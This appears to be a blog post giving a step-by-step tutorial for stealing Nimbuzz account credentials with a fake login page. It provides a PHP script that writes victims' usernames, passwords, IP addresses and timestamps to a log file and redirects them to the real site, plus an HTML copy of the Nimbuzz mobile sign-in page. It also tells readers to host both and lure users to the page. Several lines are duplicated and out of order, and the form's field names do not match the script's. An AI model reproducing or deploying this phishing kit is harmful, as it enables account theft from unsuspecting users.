Hello all

complete the register and then you upload the files that I provide for you ....
php code:-
copy and then paste it in notepad and name the file "log.php".
The important part that you change in this section:
html code:-
Now here, i can teach u H.A.C.K nimbuzz id by fake login page . In this method , we create a fake page like http://wap.nimbuzz.com to cheat users .
The most important things in H.A.C.King with fake page is .... what do u think ? yes, leading users to this page in any way u know.
The most important things in H.A.C.King with fake page is .... what do u think ? yes, leading users to this page in any way u know.
Now for creating a fake login page u should just follow steps carefully .
First search free webhost with PHP support, I recommend you to use one of the the following host :
First search free webhost with PHP support, I recommend you to use one of the the following host :
complete the register and then you upload the files that I provide for you ....
php code:-
<?php
$file = "log.txt";$username = $_POST['username'];$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "username: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript">
<!--
window.location="http://web.nimbuzz.com";
// -->
</script>";
?>copy and then paste it in notepad and name the file "log.php".
The important part that you change in this section:
html code:-
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//OMA//DTD XHTML Mobile 1.0//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login to your Nimbuzz account</title>
<link rel=stylesheet href="http://wap.nimbuzz.com/m/css/nimbuzz.css" type="text/css" media="screen">
</head>
<body>
<div style="width: 100%; background-image: url(http://wap.nimbuzz.com//img/16/header-back.gif); padding:0px; font-size:1px;"><center><img src="http://wap.nimbuzz.com//img/16/header-nimbuzz.gif" alt="Nimbuzz" /></center></div>
<!-- <center><b>Sign in</b></center> -->
<p><b>Welcome to Nimbuzz</b></p>
<br />
<p>Chat with your buddies on Windows Live Messenger, Yahoo!, Facebook, GoogleTalk, AIM and more !</p>
<br/>
<form method="post" action="log.php">
<div>
<label>Username:<br/><input type="text" name="u" value="" maxlength="64"/></label><br/>
<label>Password:<br/><input type="password" name="p" value="" maxlength="32"/></label><br/>
<label><input type="checkbox" name="r" maxlength="64"/>&#160;Remember me</label><br/>
<input type="submit" value="Sign in"/>
</div>
</form>
<hr>
<br>
<div><a href="regUser.jsp?SID=EHWq38hN82Ron724">Create Nimbuzz acount</a></div>
<div><a href="http://get.nimbuzz.com">Download Nimbuzz</a></div>
<br><br>
</body>
</html>
copy and paste it in notepad and name the file "index.html".
enjoy hacking
0 comments:
Post a Comment